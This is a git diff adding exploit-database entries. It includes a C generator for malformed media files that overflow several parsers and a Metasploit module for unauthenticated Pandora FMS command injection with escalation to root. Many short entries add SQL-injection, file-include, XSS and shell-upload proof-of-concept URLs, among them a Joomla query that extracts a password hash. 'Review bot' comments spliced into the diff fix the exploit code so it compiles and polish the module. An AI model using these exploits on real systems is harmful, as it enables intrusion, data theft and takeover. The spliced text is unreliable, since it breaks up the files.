"filepositions"); + p += putxb(p, FLV_DATA_TYPE_ARRAY, 8); + p += putxb(p, 0x20000000, 32); + for(i = 0; i < 4000; i++) { + p += putxb(p, FLV_DATA_TYPE_NUMBER, 8); + p += putxb(p, 0x4141414141414141ULL, 64); + } + p += putxb(p, FLV_DATA_TYPE_ENDOBJECT, 8); // useless + putxb(psize, p - (psize + 3 + 4 + 3), 24); + + } else 
if(attack == 2) { + p += putxb(p, 8000 - 24, 32); + p += putxb(p, MOOV_ATOM, 32); + p += putxb(p, 8000 - 16, 32); + p += putxb(p, RMRA_ATOM, 32); + p += putxb(p, 8000 - 8, 32); + p += putxb(p, RDRF_ATOM, 32); + p += putxb(p, 0, 32); // i + 4 + p += putxb(p, 0, 32); // i + 8 + p += putxb(p, 0xffffffff, 32); // i + 12 + p += putcc(p, 'A', 8000 - 12); + + } else if(attack == 3) { + p += putxb(p, RMF_TAG, 32); + p += putxb(p, 8, 32); + p += putxb(p, MDPR_TAG, 32); + psize = p; p += 4; + p += putxb(p, 0, 16); + p += putxb(p, 1, 16); // mdpr->stream_number + p += putxb(p, 0, 32); // mdpr->max_bit_rate + p += putxb(p, 0, 32); // mdpr->avg_bit_rate + p += putxb(p, 0, 32); // mdpr->max_packet_size + p += putxb(p, 0, 32); // mdpr->avg_packet_size + p += putxb(p, 0, 32); // mdpr->start_time + p += putxb(p, 0, 32); // mdpr->preroll + p += putxb(p, 0, 32); // mdpr->duration + p += putxb(p, 0, 8); // mdpr->stream_name_size + // mdpr->stream_name + p += putxb(p, 0, 8); // +mdpr->mime_type_size=data[33+mdpr->stream_name_size]; + // mdpr->mime_type + p += putxb(p, 8, 32); // mdpr->type_specific_len + p += putxb(p, VIDO_TAG, 32); // mdpr->type_specific_data + p += putxb(p, VIDO_TAG, 32); // mdpr->type_specific_data + putxb(psize, (p - psize) + 4, 32); + p += putxb(p, PROP_TAG, 32); + psize = p; p += 4; + p += putxb(p, 0, 16); + p += putxb(p, 0, 32); + p += putxb(p, 1, 32); // avg_bitrate + p += putxb(p, 0, 32); + p += putxb(p, 0, 32); + p += putxb(p, 0, 32); + p += putxb(p, 0, 32); // this->duration + p += putxb(p, 0, 32); + p += putxb(p, (p - buff) + 8 + 8 + DATA_CHUNK_HEADER_SIZE, 32); +// this->index_start + p += putxb(p, 0, 32); // this->data_start + putxb(psize, (p - psize) + 4, 32); + p += putxb(p, DATA_TAG, 32); + psize = p; p += 4; + p += putxb(p, 0, 16); + p += putxb(p, 0, 32); // +this->current_data_chunk_packet_count + p += putxb(p, 0, 32); // +this->next_data_chunk_offset + p += putxb(p, INDX_TAG, 32); + p += putxb(p, 0, 32); + p += putxb(p, 0, 16); + p += putxb(p, 
0x15555556, 32); // entries + p += putxb(p, 1, 16); // stream_num + p += putxb(p, 0, 32); // next_index_chunk + for(i = 0; i < 4000; i++) { + p += putxb(p, 0x41414141, 32); + p += putxb(p, 0x41414141, 32); + p += putxb(p, 0x41414141, 32); + } + putxb(psize, (p - psize) + 4, 32); + + } else if(attack == 4) { + p += putxb(p, FORM_TAG, 32); + p += putxb(p, 0, 32); + p += putxb(p, MOVE_TAG, 32); + p += putxb(p, PC_TAG, 32); + p += putxb(p, 0, 32); + p += putxb(p, 0, 32); + p += putxb(p, 0, 32); + p += putxi(p, 0x555556, 32); // this->number_of_shots + p += putxb(p, 0, 32); + p += putxb(p, 0, 32); + p += putxb(p, 0, 32); + for(i = 0; i < 80; i++) { + p += putxb(p, PALT_TAG, 32); + p += putxb(p, PALETTE_CHUNK_SIZE, 32); + p += putcc(p, 13, PALETTE_CHUNK_SIZE); // -> 0x48 + } + + } else if(attack == 5) { + p += gst_ebml_write_element_id(p, EBML_ID_EBML); + p += gst_ebml_write_element_size(p, 8000); // not perfect + p += gst_ebml_write_element_id(p, EBML_ID_DOCTYPE); + p += gst_ebml_write_element_size(p, 0xffffffff); + p += putcc(p, 'A', 8000); + + } else if(attack == 6) { + p += putss(p, "FILM"); + p += 4; + p += putss(p, "1.09"); + p += putxb(p, 0, 32); + p += putxb(p, STAB_TAG, 32); + psize = p; p += 4; + p += putxb(p, 44100, 32); + p += putxb(p, 0x71c71c8, 32); // sizeof(film_sample_t) is +36 bytes + for(i = 0; i < 3000; i++) { + p += putxb(p, 0x41414141, 32); + p += putxb(p, 0x41414141, 32); + p += putxb(p, 0x41414141, 32); + p += putxb(p, 0x41414141, 32); + } + putxb(psize, (p - psize) - 40, 32); + putxb(buff + 4, (p - psize) - 8 - 16, 32); + + } else { + printf("\nError: wrong attack number (%d)\n", attack); + exit(1); + } + + printf("- create file %s\n", fname); + fd = fopen(fname, "wb"); + if(!fd) std_err(); + printf("- write %u bytes\n", p - buff); + fwrite(buff, 1, p - buff, fd); + fclose(fd); + + printf("- done\n"); + return(0); +} + + + +int gst_ebml_write_element_id(u8 *data, u32 id) { // from Gstreamer + int ret, bytes = 4, mask = 0x10; + + while (!(id & 
(mask << ((bytes - 1) * 8))) && bytes > 0) { + mask <<= 1; + bytes--; + } + + if (bytes == 0) { + bytes = 1; + id = GST_EBML_ID_VOID; + } + + ret = bytes; + while (bytes--) { + data[bytes] = id & 0xff; + id >>= 8; + } + return(ret); +} + + + +int gst_ebml_write_element_size(u8 *data, i64 size) { // from Gstreamer + int ret, bytes = 1, mask = 0x80; + + if (size != GST_EBML_SIZE_UNKNOWN) { + while ((size >> ((bytes - 1) * 8)) >= (mask - 1) && bytes <= 8) { + mask >>= 1; + bytes++; + } + + if (bytes > 8) { + mask = 0x01; + bytes = 8; + size = GST_EBML_SIZE_UNKNOWN; + } + } else { + mask = 0x01; + bytes = 8; + } + + ret = bytes; + while (bytes-- > 0) { + data[bytes] = size & 0xff; + size >>= 8; + if (!bytes) + *data |= mask; + } + return(ret); +} + + + +int putcc(u8 *data, int chr, int len) { + memset(data, chr, len); + return(len); +} + + + +int putss(u8 *data, u8 *str) { + int len; + + len = strlen(str); + memcpy(data, str, len); + return(len); +} + + + +int putxb(u8 *data, u64 num, int bits) { + int i, + bytes; + + bytes = bits >> 3; + for(i = 0; i < bytes; i++) { + data[i] = (num >> ((bytes - 1 - i) << 3)) & 0xff; + } + return(bytes); +} + + + +int putxi(u8 *data, u64 num, int bits) { + int i, + bytes; + + bytes = bits >> 3; + for(i = 0; i < bytes; i++) { + data[i] = (num >> (i << 3)) & 0xff; + } + return(bytes); +} + + + +void std_err(void) { + perror("\nError"); + exit(1); +} + + + diff --git a/platforms/linux/remote/31518.rb b/platforms/linux/remote/31518.rb new file mode 100755 index 000000000..f3e54fc35 --- /dev/null +++ b/platforms/linux/remote/31518.rb 
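Review bot: The four `#include` lines at the top of the listing are empty, so the file does not compile as committed; the header names appear to have been lost when the source was scraped from SecurityFocus, and the `"Usage: %s \n"` line has lost its argument placeholders the same way. The functions used — `fopen`/`printf`/`perror`, `malloc`/`atoi`/`exit`, `memset`/`memcpy`/`strlen`, and the `uint8_t`/`uint64_t` typedefs — pin the headers down, and `"Usage: %s <attack> <output_file>\n"` is what the argv handling implies. A smaller nit while here: `printf("- write %u bytes\n", p - buff)` passes a `ptrdiff_t` to `%u`; `(unsigned)(p - buff)` keeps the output correct on LP64. The restored include block is below.
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
/* … unchanged: typedefs, tag #defines, main(), helpers … */
```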
@@ -0,0 +1,113 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::EXE
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Pandora FMS Remote Code Execution",
+ 'Description' => %q{
+ This module exploits a vulnerability found in Pandora FMS 5.0RC1 and lower.
+ It will leverage an unauthenticated command injection in the Anyterm service on
+ port 8023. Commands are executed as the user "pandora". In Pandora FMS 4.1 and 5.0RC1
+ the user "artica" is not assigned a password by default, which makes it possible to su
+ to this user from the "pandora" user. The "artica" user has access to sudo without a
+ password, which makes it possible to escalate privileges to root. However, Pandora FMS 4.0
+ and lower force a password for the "artica" user during installation.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'xistence ' # Vulnerability discovery and Metasploit module
+ ],
+ 'References' =>
+ [
+ ],
+ 'Payload' =>
+ {
+ 'BadChars' => "",
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'generic perl python',
+ }
+ },
+ 'Platform' => ['unix'],
+ 'Arch' => ARCH_CMD,
+ 'Targets' =>
+ [
+ ['Pandora 5.0RC1', {}]
+ ],
+ 'Privileged' => true,
+ 'DisclosureDate' => "Jan 29 2014",
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ Opt::RPORT(8023),
+ OptString.new('TARGETURI', [true, 'The base path to the Pandora instance', '/']),
+ ], self.class)
+ end
+
+ def on_new_session(client)
+ print_status("#{peer} - Trying to escalate privileges to root")
+ [
+ # ignore SIGHUP so the server doesn't kill our root shell
+ "trap '' HUP",
+ # Spawn a pty for su/sudo
+ "python -c 'import pty;pty.spawn(\"/bin/sh\")'",
+ # Su to the passwordless "artica" account
+ "su - artica",
+ # The "artica" use has sudo rights without the need for a
+ # password, thus gain root priveleges
+ "sudo -s",
+ ].each do |command|
+ vprint_status(command)
+ client.shell_write(command + "\n")
+ end
+
+ super
+ end
+
+ def check
+ # Check version
+ print_status("#{peer} - Trying to detect Pandora FMS Remote Gateway")
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, "anyterm.html")
+ })
+
+ if res && res.code == 200 && res.body.include?("Pandora FMS Remote Gateway")
+ print_good("#{peer} - Pandora FMS Remote Gateway Detected!")
+ return Exploit::CheckCode::Detected
+ end
+
+ return Exploit::CheckCode::Safe
+ end
+
+ def exploit
+ print_status("#{peer} - Sending payload")
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, "/anyterm-module"),
+ 'vars_post' => {
+ 'a' => "open",
+ 'p' => "`#{payload.encoded}`"
+ }
+ })
+
+ if !res || res.code != 200
+ fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!")
+ end
+ end
+
+end
\ No newline
at end of file
diff --git a/platforms/multiple/dos/31477.txt b/platforms/multiple/dos/31477.txt
new file mode 100755
index 000000000..7e312c7da
--- /dev/null
+++ b/platforms/multiple/dos/31477.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28413/info
+
+The 'snircd' and 'ircd' daemons are prone to a remote denial-of-service vulnerability because the application fails to properly sanitize user-supplied input.
+
+Successfully exploiting this issue allows remote attackers to crash the application, denying service to legitimate users.
+
+This issue affects versions up to and including 'snircd' 1.3.4 and 'ircu' 2.10.12.12.
+
+/mode nickname i i i i i i i i i i i i i i i r r r r s
\ No newline at end of file
diff --git a/platforms/osx/remote/31473.html b/platforms/osx/remote/31473.html
new file mode 100755
index 000000000..ea1d33105
--- /dev/null
+++ b/platforms/osx/remote/31473.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28405/info
+
+Apple Safari is prone to a content-spoofing vulnerability that allows attackers to populate a vulnerable Safari browser window with arbitrary malicious content. During such an attack, the URL and window title will display the intended site, while the body of the webpage is spoofed.
+
+Safari 3.1 running on Microsoft Windows is reported vulnerable.
+
+NOTE: This issue may be related to the vulnerability discussed in BID 24457 (Apple Safari for Windows Window.setTimeout Content Spoofing Vulnerability).
+
+ Safari browser 3.1 (525.13) spoofing by Juan Pablo Lopez Yacubian Recipe 6.6
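Review bot: The `'References'` array in `initialize` is empty, so the module carries no pointer to a vendor advisory or tracking ID that a defender could use to locate the fix; add an entry such as `['URL', '<vendor-advisory-url placeholder>']` once the source is confirmed. In `exploit`, the non-200 branch calls `fail_with(Failure::Unknown, ...)` although `Failure::UnexpectedReply` is the framework's reason code for exactly this condition. The comment pair in `on_new_session` has two typos and should read `# The "artica" user has sudo rights without needing a password, so this gains root privileges`. `check` only confirms that the gateway page is served and cannot distinguish a patched build from 5.0RC1, which is why Detected rather than Vulnerable is the right code; a one-line comment saying so would stop a later maintainer from "upgrading" the result. `check` also passes `"anyterm.html"` while `exploit` passes `"/anyterm-module"` to `normalize_uri`; the leading slash is harmless but inconsistent.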
\ No newline at end of file
diff --git a/platforms/php/remote/31479.txt b/platforms/php/remote/31479.txt
new file mode 100755
index 000000000..7db82edc7
--- /dev/null
+++ b/platforms/php/remote/31479.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28417/info
+
+Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/QuickSystems_path/index.php3?DOCUMENT_ROOT=ZoRLu.txt?
\ No newline at end of file
diff --git a/platforms/php/webapps/31424.txt b/platforms/php/webapps/31424.txt
new file mode 100755
index 000000000..83fcf519f
--- /dev/null
+++ b/platforms/php/webapps/31424.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Wordpress Dandelion Themes Arbitry File Upload
+# Google Dork: inurl:/wp-content/themes/dandelion/
+# Date: 31/01/2014
+# Exploit Author: TheBlackMonster (Marouane)
+# Vendor Homepage: http://themeforest.net/item/dandelion-powerful-elegant-wordpress-theme/136628
+# Software Link: Not Available
+# Version: Web Application
+# Tested on: Mozilla, Chrome, Opera -> Windows & Linux
+?#?Greetz? : PhantomGhost, Deto Beiber, All Moroccan Hackers.
+
+We are Moroccans, we are genuis !
+
+"@$uploadfile"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+?>
+
+File Access :
+
+http://127.0.0.1/uploads/[years]/[month]/your_shell.php
diff --git a/platforms/php/webapps/31458.txt b/platforms/php/webapps/31458.txt
new file mode 100755
index 000000000..a64202b4f
--- /dev/null
+++ b/platforms/php/webapps/31458.txt
@@ -0,0 +1,35 @@
+# Exploit: PHP Webcam Video Conference - LFI/XSS
+# Date: 06/02/2014
+# Exploit Author: vinicius777
+# Contact: vinicius777 [AT] gmail / @vinicius777_
+# Vendor Homepage: http://www.videowhisper.com/
+# Software Link: http://sourceforge.net/projects/phpwebcamvideoconference
+# Solution: Upgrade from to the new version on videowhisper vendor homepage.
+
+
+
+
+[1] Local File Include - rtmp_login.php
+
+P0C: http://192.168.1.7/vc_php/rtmp_login.php?s=../../../../../etc/passwd
+
+[+] rtmp_rlogin.php
+
+$session = $_GET['s'];
+
+$filename1 = "uploads/_sessions/$session";
+if (file_exists($filename1))
+{
+echo implode('', file($filename1));
+}
+else
+{
+echo "VideoWhisper=1&login=0";
+}
+?>
+
+
+[2] XSS Reflected
+
+P0C = http://192.168.1.7/vc_php/vc_logout.php?message=[XSS]
+
diff --git a/platforms/php/webapps/31459.txt b/platforms/php/webapps/31459.txt
new file mode 100755
index 000000000..d4fc40918
--- /dev/null
+++ b/platforms/php/webapps/31459.txt
@@ -0,0 +1,24 @@ +# Exploit Title: Joomla 3.2.1 sql injection +# Date: 05/02/2014 +# Exploit Author: kiall-9@mail.com +# Vendor Homepage: http://www.joomla.org/ +# Software Link: http://joomlacode.org/gf/download/frsrelease/19007/134333/Joomla_3.2.1-Stable-Full_Package.zip +# Version: 3.2.1 (default installation with Test sample data) +# Tested on: Virtualbox (debian) + apache +POC=> +http://localhost/Joomla_3.2.1/index.php/weblinks-categories?id=\ + +will cause an error: + +1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\)' at line 3 SQL=SELECT `t`.`id` FROM `k59cv_tags` AS t INNER JOIN `k59cv_contentitem_tag_map` AS m ON `m`.`tag_id` = `t`.`id` AND `m`.`type_alias` = 'com_weblinks.categories' AND `m`.`content_item_id` IN ( \) Array ( [type] => 8 [message] => Undefined offset: 0 [file] => /var/www/Joomla_3.2.1/libraries/joomla/filter/input.php [line] => 203 ) + +I modified the original error.php file with this code --- --- in order to obtain something useful. 
;-) + +Now i can easily exploit this flaw: + +http://localhost/Joomla_3.2.1/index.php/weblinks-categories?id=0%20%29%20union%20select%20password%20from%20%60k59cv_users%60%20--%20%29 +and obtain the hash: + +1054 Unknown column '$P$D8wDjZpDIF4cEn41o0b4XW5CUrkCOZ1' in 'where clause' SQL=SELECT `m`.`tag_id`,`m`.`core_content_id`,`m`.`content_item_id`,`m`.`type_alias`,COUNT( `tag_id`) AS `count`,`t`.`access`,`t`.`id`,`ct`.`router`,`cc`.`core_title`,`cc`.`core_alias`,`cc`.`core_catid`,`cc`.`core_language` FROM `k59cv_contentitem_tag_map` AS `m` INNER JOIN `k59cv_tags` AS `t` ON m.tag_id = t.id INNER JOIN `k59cv_ucm_content` AS `cc` ON m.core_content_id = cc.core_content_id INNER JOIN `k59cv_content_types` AS `ct` ON m.type_alias = ct.type_alias WHERE `m`.`tag_id` IN ($P$D8wDjZpDIF4cEn41o0b4XW5CUrkCOZ1) AND t.access IN (1,1) AND (`m`.`content_item_id` <> 0 ) union select password from `k59cv_users` -- ) OR `m`.`type_alias` <> 'com_weblinks.categories') AND `cc`.`core_state` = 1 GROUP BY `m`.`core_content_id` ORDER BY `count` DESC LIMIT 0, 5 + +CheerZ> diff --git a/platforms/php/webapps/31467.txt b/platforms/php/webapps/31467.txt new file mode 100755 index 000000000..255dd385f --- /dev/null +++ b/platforms/php/webapps/31467.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28399/info + +phpMyChat is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +phpMyChat 0.14.5 is vulnerable; other versions may also be affected. + +http://www.example.com/chat/setup.php3?Lang=" \ No newline at end of file diff --git a/platforms/php/webapps/31468.txt b/platforms/php/webapps/31468.txt new file mode 100755 index 000000000..c3d688ce9 --- /dev/null 
+++ b/platforms/php/webapps/31468.txt @@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/28400/info + +My Web Doc is prone to multiple authentication-bypass vulnerabilities. + +Attackers can leverage these issues to compromise the application, which could aid in other attacks. + +My Web Doc 2000 Final is vulnerable; other versions may also be affected. + +http://www.example.com/mywebdocadd.php3?x +http://www.example.com/mywebdoccalendaradd.php3?x +http://www.example.com/mywebdoclisting.php3?x +http://www.example.com/mywebdocchangepassword.php3?x +http://www.example.com/mywebdocadduser.php3?x +http://www.example.com/mywebdocuserlisting.php3?x \ No newline at end of file diff --git a/platforms/php/webapps/31469.txt b/platforms/php/webapps/31469.txt new file mode 100755 index 000000000..7e63060a9 --- /dev/null +++ b/platforms/php/webapps/31469.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28401/info + +ooComments is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +ooComments 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/classes/class_admin.php?PathToComment=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31470.txt b/platforms/php/webapps/31470.txt new file mode 100755 index 000000000..1c7febfaa --- /dev/null +++ b/platforms/php/webapps/31470.txt 
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28401/info + +ooComments is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +ooComments 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/classes/class_comments.php?PathToComment=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31471.txt b/platforms/php/webapps/31471.txt new file mode 100755 index 000000000..faef27cc8 --- /dev/null +++ b/platforms/php/webapps/31471.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/28402/info + +TinyPortal is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/index.php?PHPSESSID="> \ No newline at end of file diff --git a/platforms/php/webapps/31472.txt b/platforms/php/webapps/31472.txt new file mode 100755 index 000000000..82a259268 --- /dev/null +++ b/platforms/php/webapps/31472.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/28403/info + +cPanel is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/frontend/x/manpage.html? \ No newline at end of file 
diff --git a/platforms/php/webapps/31476.txt b/platforms/php/webapps/31476.txt new file mode 100755 index 000000000..4dd86d411 --- /dev/null +++ b/platforms/php/webapps/31476.txt @@ -0,0 +1,8 @@ +source: http://www.securityfocus.com/bid/28412/info + +Efestech E-Kontor is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/?id=-1%20union+select+0,sifre,2,3+from+admin+where+id=1 +http://www.example.com/?id=-1%20union+select+0,firma,2,3+from+admin+where+id=1 \ No newline at end of file diff --git a/platforms/php/webapps/31480.txt b/platforms/php/webapps/31480.txt new file mode 100755 index 000000000..f964058ea --- /dev/null +++ b/platforms/php/webapps/31480.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/locate.php3?DOCUMENT_ROOT=ZoRLu.txt?, \ No newline at end of file diff --git a/platforms/php/webapps/31481.txt b/platforms/php/webapps/31481.txt new file mode 100755 index 000000000..15d3e14a7 --- /dev/null +++ b/platforms/php/webapps/31481.txt 
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/search_results.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31482.txt b/platforms/php/webapps/31482.txt new file mode 100755 index 000000000..01e57c145 --- /dev/null +++ b/platforms/php/webapps/31482.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/classifieds/index.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31483.txt b/platforms/php/webapps/31483.txt new file mode 100755 index 000000000..3f2c9ebe5 --- /dev/null +++ b/platforms/php/webapps/31483.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/classifieds/view.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file 
diff --git a/platforms/php/webapps/31484.txt b/platforms/php/webapps/31484.txt new file mode 100755 index 000000000..c913b5582 --- /dev/null +++ b/platforms/php/webapps/31484.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlcenter/index.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31485.txt b/platforms/php/webapps/31485.txt new file mode 100755 index 000000000..0908b0726 --- /dev/null +++ b/platforms/php/webapps/31485.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlcenter/manager.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31486.txt b/platforms/php/webapps/31486.txt new file mode 100755 index 000000000..5703f9c55 --- /dev/null +++ b/platforms/php/webapps/31486.txt 
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlcenter/pass.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31487.txt b/platforms/php/webapps/31487.txt new file mode 100755 index 000000000..642344350 --- /dev/null +++ b/platforms/php/webapps/31487.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlcenter/remember.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31488.txt b/platforms/php/webapps/31488.txt new file mode 100755 index 000000000..47ddeec10 --- /dev/null +++ b/platforms/php/webapps/31488.txt 
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlcenter/sign-up.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31489.txt b/platforms/php/webapps/31489.txt new file mode 100755 index 000000000..b47be866d --- /dev/null +++ b/platforms/php/webapps/31489.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlcenter/update.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31490.txt b/platforms/php/webapps/31490.txt new file mode 100755 index 000000000..036e61437 --- /dev/null +++ b/platforms/php/webapps/31490.txt 
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlcenter/userSet.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31491.txt b/platforms/php/webapps/31491.txt new file mode 100755 index 000000000..561ceabdc --- /dev/null +++ b/platforms/php/webapps/31491.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlcenter/verify.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31492.txt b/platforms/php/webapps/31492.txt new file mode 100755 index 000000000..ed3276606 --- /dev/null +++ b/platforms/php/webapps/31492.txt 
